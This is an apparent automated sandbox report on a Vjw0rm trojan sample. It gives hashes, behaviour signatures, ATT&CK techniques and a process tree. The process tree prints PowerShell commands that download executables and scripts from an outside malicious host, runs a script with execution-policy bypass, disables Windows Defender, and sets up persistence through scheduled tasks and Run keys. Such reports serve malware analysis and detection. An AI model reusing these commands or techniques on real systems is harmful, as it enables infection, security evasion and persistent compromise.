vjw0rm | 22f93b97e4ee74c1af48cbdcf878a983cbe2fba7eefc5cd639814dc942cbaa8d

Analysis

max time kernel
136s
max time network
112s
platform
windows10_x64
resource
win10v20210410
submitted
29-06-2021 20:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
Size

3.1MB
MD5

52bbd67fdb23378f2ad43efb150abdc4
SHA1

9d138f1bf129473cb0d74c0d94ec8af2daa311c7
SHA256

22f93b97e4ee74c1af48cbdcf878a983cbe2fba7eefc5cd639814dc942cbaa8d
SHA512

7cf115c532466de78abd369ba202f738a3520f7c2b87c4847a8d8e59dc6e2c0d7cd9da1995d019690edd92b3ed154a9d659b7a6932c091e9c042192a66049755

Score

10^/10

vjw0rm evasion persistence trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://gamecardsy.com/ahmadtestupl/DefenderControl.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://gamecardsy.com/ahmadtestupl/DefenderKill.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://gamecardsy.com/ahmadtestupl/Defender.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://gamecardsy.com/ahmadtestupl/ff.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://gamecardsy.com/ahmadtestupl/DefenderControl.txt

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

Setup.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" Setup.exe
Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

12 1824 powershell.exe
13 184 powershell.exe
14 3168 powershell.exe
15 2448 powershell.exe
16 2336 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

Setup.exeDefenderControl.exeDefenderControl.execonhostHost.execonhost.execonhost.exe

pid process

3996 Setup.exe
3228 DefenderControl.exe
2008 DefenderControl.exe
1932 conhostHost.exe
2024 conhost.exe
1576 conhost.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	Setup.exe

flow	pid	process
12	1824	powershell.exe
13	184	powershell.exe
14	3168	powershell.exe
15	2448	powershell.exe
16	2336	powershell.exe

pid	process
3996	Setup.exe
3228	DefenderControl.exe
2008	DefenderControl.exe
1932	conhostHost.exe
2024	conhost.exe
1576	conhost.exe

Drops startup file 4 IoCs

Processes:

conhost.execonhostHost.execonhost.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	conhost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe.manifest	conhostHost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	conhost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	conhost.exe

Windows security modification 2 TTPs 1 IoCs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

DefenderControl.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection DefenderControl.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	DefenderControl.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

conhost.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run	conhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\QYG44E4BTK = "\"C:\\ProgramData\\conhost.exe\""	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run	conhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\QYG44E4BTK = "\"C:\\ProgramData\\conhost.exe\""	conhost.exe

Drops file in System32 directory 2 IoCs

Processes:

DefenderControl.exe

description	ioc	process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	DefenderControl.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	DefenderControl.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1920 schtasks.exe
3616 schtasks.exe

pid	process
1920	schtasks.exe
3616	schtasks.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

conhost.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	conhost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	conhost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	conhost.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeDefenderControl.exe

pid	process
1824	powershell.exe
1824	powershell.exe
1824	powershell.exe
184	powershell.exe
184	powershell.exe
184	powershell.exe
3168	powershell.exe
3168	powershell.exe
3168	powershell.exe
2448	powershell.exe
2448	powershell.exe
2448	powershell.exe
2336	powershell.exe
2336	powershell.exe
2336	powershell.exe
2356	powershell.exe
2356	powershell.exe
2356	powershell.exe
3228	DefenderControl.exe
3228	DefenderControl.exe
3228	DefenderControl.exe
3228	DefenderControl.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Setup.exe

pid process

3996 Setup.exe

pid	process
3996	Setup.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1824	powershell.exe
Token: SeDebugPrivilege	184	powershell.exe
Token: SeDebugPrivilege	3168	powershell.exe
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	2356	powershell.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exeDefenderControl.execonhostHost.exe

pid	process
3944	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
3228	DefenderControl.exe
3228	DefenderControl.exe
3228	DefenderControl.exe
3944	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
1932	conhostHost.exe
1932	conhostHost.exe

Suspicious use of SendNotifyMessage 4 IoCs

Processes:

22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.execonhostHost.exe

pid	process
3944	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
3944	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
1932	conhostHost.exe
1932	conhostHost.exe

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.execmd.exepowershell.execmd.execonhostHost.execonhost.execonhost.exe

description	pid	process	target process
PID 3944 wrote to memory of 3996	3944	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	Setup.exe
PID 3944 wrote to memory of 3996	3944	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	Setup.exe
PID 3944 wrote to memory of 3996	3944	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	Setup.exe
PID 3944 wrote to memory of 1348	3944	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	cmd.exe
PID 3944 wrote to memory of 1348	3944	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	cmd.exe
PID 3944 wrote to memory of 1348	3944	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	cmd.exe
PID 1348 wrote to memory of 1824	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 1824	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 1824	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 184	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 184	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 184	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 3168	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 3168	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 3168	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 2448	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 2448	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 2448	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 2336	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 2336	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 2336	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 2356	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 2356	1348	cmd.exe	powershell.exe
PID 1348 wrote to memory of 2356	1348	cmd.exe	powershell.exe
PID 2356 wrote to memory of 2372	2356	powershell.exe	cmd.exe
PID 2356 wrote to memory of 2372	2356	powershell.exe	cmd.exe
PID 2356 wrote to memory of 2372	2356	powershell.exe	cmd.exe
PID 2372 wrote to memory of 3228	2372	cmd.exe	DefenderControl.exe
PID 2372 wrote to memory of 3228	2372	cmd.exe	DefenderControl.exe
PID 2372 wrote to memory of 3228	2372	cmd.exe	DefenderControl.exe
PID 2372 wrote to memory of 2008	2372	cmd.exe	DefenderControl.exe
PID 2372 wrote to memory of 2008	2372	cmd.exe	DefenderControl.exe
PID 2372 wrote to memory of 2008	2372	cmd.exe	DefenderControl.exe
PID 3944 wrote to memory of 1932	3944	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	conhostHost.exe
PID 3944 wrote to memory of 1932	3944	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	conhostHost.exe
PID 1932 wrote to memory of 2024	1932	conhostHost.exe	conhost.exe
PID 1932 wrote to memory of 2024	1932	conhostHost.exe	conhost.exe
PID 1932 wrote to memory of 2024	1932	conhostHost.exe	conhost.exe
PID 2024 wrote to memory of 1920	2024	conhost.exe	schtasks.exe
PID 2024 wrote to memory of 1920	2024	conhost.exe	schtasks.exe
PID 1576 wrote to memory of 3616	1576	conhost.exe	schtasks.exe
PID 1576 wrote to memory of 3616	1576	conhost.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
"C:\Users\Admin\AppData\Local\Temp\22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3944

C:\ProgramData\Setup.exe
C:\ProgramData\Setup.exe
2⤵
- Modifies security service
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:3996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1348

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderControl.exe', 'C:\Users\Public\DefenderControl.exe') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderKill.txt', 'C:\Users\Public\DefenderKill.lnk') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:184

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/Defender.bat', 'C:\Users\Public\Defender.bat') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3168

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/ff.ps1', 'C:\Users\Public\ff.ps1') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderControl.txt', 'C:\Users\Public\DefenderControl.ini') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File C:\Users\Public\ff.ps1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Defender.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2372

C:\Users\Public\DefenderControl.exe
DefenderControl.exe /D
5⤵
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3228

C:\Users\Public\DefenderControl.exe
DefenderControl.exe /Q
5⤵
- Executes dropped EXE
PID:2008

C:\ProgramData\conhostHost.exe
C:\ProgramData\conhostHost.exe
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1932

C:\ProgramData\conhost.exe
C:\ProgramData/conhost.exe
3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2024

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
4⤵
- Creates scheduled task(s)
PID:1920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2644

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:1096

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:188

C:\ProgramData\conhost.exe
C:\ProgramData\conhost.exe
1⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1576

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
2⤵
- Creates scheduled task(s)
PID:3616

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Install Root Certificate

T1130

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Setup.exe
MD5
1d3072caa9c82faea4ce0aff3c267d5f

SHA1
45431656c6d6e841c40bc8e80bed891193caff21

SHA256
48efc1e775c88e01600b049e1e55831fefaea5d624d94892a6efaa632181e2fe

SHA512
9d26e856ace8d48382d16346bff089439f7263b2c3f9c4dbc2cd8a797a704ab2d447df0e303b4a40cead274d0871aec1819ee81c40697efb7c759cae27ff76f5

Download Submit
C:\ProgramData\Setup.exe
MD5
1d3072caa9c82faea4ce0aff3c267d5f

SHA1
45431656c6d6e841c40bc8e80bed891193caff21

SHA256
48efc1e775c88e01600b049e1e55831fefaea5d624d94892a6efaa632181e2fe

SHA512
9d26e856ace8d48382d16346bff089439f7263b2c3f9c4dbc2cd8a797a704ab2d447df0e303b4a40cead274d0871aec1819ee81c40697efb7c759cae27ff76f5

Download Submit
C:\ProgramData\conhost.exe
MD5
fdbd7b1910d980cf7273796a0119d252

SHA1
47029af064a51454662909465ce38ee5cdcc62c7

SHA256
3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

SHA512
ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

Download Submit
C:\ProgramData\conhost.exe
MD5
fdbd7b1910d980cf7273796a0119d252

SHA1
47029af064a51454662909465ce38ee5cdcc62c7

SHA256
3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

SHA512
ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

Download Submit
C:\ProgramData\conhost.exe
MD5
fdbd7b1910d980cf7273796a0119d252

SHA1
47029af064a51454662909465ce38ee5cdcc62c7

SHA256
3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

SHA512
ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

Download Submit
C:\ProgramData\conhost.exe.manifest
MD5
c52800b49b2392de3d171515d13b8dd2

SHA1
9c59962bb6dbf5317c2684ed542c1c12a7778747

SHA256
830bab8f10c1bd63d50e40e0137d9f26eac59fb8c4c4c53840c674e4793fcb66

SHA512
c36c8f8080d617e058c2325fb7515059c6a5c1eb97e8c76440f44a8c1889d6616d2b8c92ac2d8b1e1754409912722d941aaeb4cb28eda1df08c148ed3497559a

Download Submit
C:\ProgramData\conhostHost.exe
MD5
0556e409646df2fac47ab802d946c040

SHA1
a1c3717b3dd3ae7def30e9b8bb6dc92979b57de9

SHA256
7c46e3309671f2c70dc1c78b8bbeb132684d9f0014b6c4671e1d12cc75f8cd89

SHA512
60b6659b24949c20b32bc7e1b7e3a40bde4d5b0b354e55ea1aeadab05be448b89e1df3d094c01aaf008c93dec91d168193e77a63e6a26189341441905bb09596

Download Submit
C:\ProgramData\start.bat
MD5
25768ca0dbfdaafacf64ec31c72ab131

SHA1
0c06ddcc9592a62f76589dfd51e29558ade3db23

SHA256
dbb2aa62e7815bec646a0e160b658479040966edb3832c95e2647b0f3053df17

SHA512
6dbfb8b3beddf8c788d5d2d0d1cdf754a5892a787192f3d0461ec277eefa849db0d26c17595c8d006d576f969d05e57022420c8f5a15d09e2306228579e70182

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
66382a4ca6c4dcf75ce41417d44be93e

SHA1
8132cbef1c12f8a89a68a6153ade4286bf130812

SHA256
a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56

SHA512
2bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
60c74628a1cb13a50251418ac89046e4

SHA1
f7f554a5a9a4c481f8444d2a3dd25a2df46dbe87

SHA256
4c848f3b15555e38dc778482a10dbff084184d9b5acb55fc9d643045efb3a7a8

SHA512
afd92415ff1297fa5d6edbd30aba0a88b03ebd8e5bf33ffde1074b1dc4cd45fa1790ac77effade77820411a2ee336acf75e883dd30c2bf8198975dd9e6c37391

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0891078a603b75d6f1304285223ebfad

SHA1
87012c3cce6846cd6f26170880b97ab1d94e3d68

SHA256
8c8fd9f4d7895c2df42cae1c533c74b7312638f790a40a879206fce1cf2f1e51

SHA512
6252ed193400f9db35a53618dae5bada66f3fce565d2bde49561b9dc2eb7f23f951dce39106edb4155a3eaa307f2702dfee166fee0c101ab9c30ca9f34edda49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2d6a936f5bbbe4630176e1144278ca86

SHA1
501b39603afa910e1676e7d5cff3628355ddda96

SHA256
a7e7ef4d65691673b0682f35e5d1a119a8e66d4f780abc638dfdc57a34fea2a2

SHA512
6684d117480eddb880af486a1edfc8c8b94112ca5605343dc869c906a366291c6af340571dd78b59d5820106d9573a8fd4d663c1fa4fbcb5e03becd032892c6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2118eea3656220f07bcf33646946f91e

SHA1
7580da0f655cd0096ce89751a6f078ffd3138ae3

SHA256
8ae15d384e8927d2fc7d1a19e2fc3657c2a509acfe4f848ba8b4ddeefca02867

SHA512
a3b091e658338bbbe4843f7ea831161a95bc7ca5049e0480ac553f01fb56535be58992eb3e33d5492dd3cf9d892167411ca2fafda15c7211ba1eaf2a76f3c2da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
7ac0a1bfae29dec3d721f6aa0c503d8c

SHA1
64a4f3ec3e124a827458738c0565dcab261b447b

SHA256
302931fca9aebeb3a7065528036dcfdb57bf09358ee0605f25c135de55b9cd7e

SHA512
f4d6b38945cec276f6cef00ba9ff7315011699166fd804d1227edd53e5c1bbb60cce90a1c10d16cbd6e5ea16b6aca657a52bb83b8be0e3fb4b63768250c5b9f6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Public\Defender.bat
MD5
6e18e46e1925e47c36dd5c936abc9ae7

SHA1
eaaff27bde9261cd3ebaf569cf0f2566a2269464

SHA256
989b2c6f7dab1f36a2c21fbc165fa73e6e5aa22a35c63aedfc41727fe5cfcd1e

SHA512
